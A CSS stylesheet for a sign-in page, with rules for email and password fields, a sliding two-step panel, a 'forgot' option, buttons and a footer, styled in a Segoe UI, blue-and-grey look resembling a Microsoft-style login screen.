body {
  color: rgb(27, 27, 27);
  display: flex;
  flex-direction: column;
  font-family: "Segoe UI", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
  font-size: 15px;
  font-weight: 400;
  line-height: 1.25rem;
  margin: 0px;
  min-height: 100vh;

  @media (min-width: 600px) {
    align-items: center;
    background-color: rgb(242, 242, 242);
    background-image: url(background.svg);
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    justify-content: center;
  }
}

body,
body * {
  box-sizing: border-box;
}

p {
  font-size: 0.8125rem;
  margin: 0px;
}

a {
  color: rgb(0, 103, 184);
  text-decoration: none;

  &:hover {
    color: inherit;
    text-decoration: underline;
  }
}

button {
  align-self: flex-end;
  background: rgb(0, 103, 184);
  border: 1px solid rgb(0, 103, 184);
  color: white;
  cursor: pointer;
  font-size: 15px;
  margin-top: auto;
  min-height: 32px;
  min-width: 108px;
  padding: 4px 12px;

  @media (max-width: 599px) {
    margin-top: 32px;
  }
}

button:hover {
  background: rgb(0, 93, 166)
}

.panel {
  background: white;
  display: flex;

  @media (min-width: 600px) {
    box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 6px;
  }
}

.login-container {
  flex-direction: column;
  min-height: 338px;

  @media (max-width: 599px) {
    min-height: 310px;
  }

  @media (min-width: 600px) {
    margin-bottom: 20px;
    padding: 44px;
  }
}

.user {
  align-items: center;
  cursor: pointer;
  display: flex;
  gap: 8px;
  margin-top: 16px;
}

.slider-container {
  margin-top: 5px;
  overflow: hidden;
}

.slider {
  display: flex;
  transition: transform 0.5s ease;
  width: 200%;
}

.slide {
  display: flex;
  flex: 1;
  flex-direction: column;
  width: 50%;
}

.forgot {
  align-items: center;
  cursor: pointer;
  display: flex;
  gap: 8px;
  padding: 8px 44px;

  @media (max-width: 599px) {
    border: 1px solid rgb(27, 27, 27);
  }
}

.forgot:hover {
  background-color: rgba(229, 229, 229);
}

.title {
  font-size: 1.5rem;
  font-weight: 600;
  line-height: 28px;
  margin: 16px 0 12px;
}

input[type="email"],
input[type="password"] {
  background: transparent;
  border-color: rgb(102, 102, 102);
  border-style: solid;
  border-width: 0 0 1px;
  font-size: 15px;
  height: 36px;
  line-height: 20px;
  margin-bottom: 16px;
  padding: 6px 10px 6px 0;
  width: 100%;
}

input[type="email"]:focus,
input[type="password"]:focus {
  border-color: rgb(0, 103, 184);
  outline: none;
}

.bit-of-margin {
  margin-bottom: 8px;
}

.content {
  max-width: 440px;
  min-width: 320px;
  width: calc(100% - 40px);

  @media (max-width: 599px) {
    margin: 0 auto auto;
    padding: 24px;
  }

  @media (min-width: 600px) {
    margin: auto;
  }
}

.footer {
  display: flex;
  font-size: 12px;
  gap: 16px;
  justify-content: flex-end;
  padding: 0 8px;
  width: 100%;
}

.footer-link {
  color: black;
  line-height: 28px;
}

.more {
  font-size: 16px;
  font-weight: 600;
  letter-spacing: 3px;
  position: relative;
  top: -3px;
}
